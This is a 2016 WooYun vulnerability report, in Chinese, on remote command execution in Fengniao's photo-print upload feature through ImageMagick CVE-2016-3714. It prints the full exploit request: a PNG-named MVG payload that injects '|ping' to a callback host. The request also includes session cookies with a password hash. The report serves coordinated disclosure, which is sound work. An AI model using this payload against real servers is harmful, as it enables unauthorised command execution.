当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0215007

漏洞标题:蜂鸟网某站另一处远程命令执行

相关厂商:fengniao.com

漏洞作者: 路人甲

提交时间:2016-06-01 13:31

修复时间:2016-07-16 13:40

公开时间:2016-07-16 13:40

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-06-01: 细节已通知厂商并且等待厂商处理中
2016-06-01: 厂商已经确认,细节仅向厂商公开
2016-06-11: 细节向核心白帽子及相关领域专家公开
2016-06-21: 细节向普通白帽子公开
2016-07-01: 细节向实习白帽子公开
2016-07-16: 细节向公众公开

简要描述:

详细说明:

目标:http://yin.fengniao.com/?do=Create/Calendar&type=2#4020
检测发现蜂鸟印制作上传图片处存在CVE-2016-3714 - ImageMagick 命令执行

POST http://yin.fengniao.com/?do=Ajax/Calendar&a=fileUpload&productId=2&productionId=4020 HTTP/1.1
Host: yin.fengniao.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://yin.fengniao.com/?do=Create/Calendar&type=2
Content-Length: 310
Content-Type: multipart/form-data; boundary=---------------------------12092260437882
Cookie: ip_ck=4M+J5vr3j7QuNzg4MTAwLjE0NjQ3NDU0MTU%3D; lv=1464745417; vn=1; Hm_lvt_916ddc034db3aa7261c5d56a3001e7c5=1464745423; Hm_lpvt_916ddc034db3aa7261c5d56a3001e7c5=1464746474; bbuserid=10297207; bbpassword=3f2646d82d71bf1076da85217a3f7d8c; bbusername=123321aabb; message_str_10297207=0%7C0%7C0%7C38; 9a483e1e1124621acbda816b30abe30f=3u7g7o2k4dv35jg%7B%7BZ%7D%7D%25E4%25B8%258A%25E4%25BC%25A0%25E7%2585%25A7%25E7%2589%2587%7B%7BZ%7D%7Dnull; MyZClick_9a483e1e1124621acbda816b30abe30f=/html/body/div%5B2%5D/div%5B2%5D/div/a/
Connection: keep-alive
-----------------------------12092260437882
Content-Disposition: form-data; name="fileData[]"; filename="3.png"
Content-Type: image/png
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 '|ping fengniao.xxx.xxx'
pop graphic-context
-----------------------------12092260437882--

漏洞证明:

仅以cloudeye为证,具体就不深入了

QQ截图20160601101713.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-06-01 13:39

厂商回复:

感谢提醒,已修复

最新状态:

暂无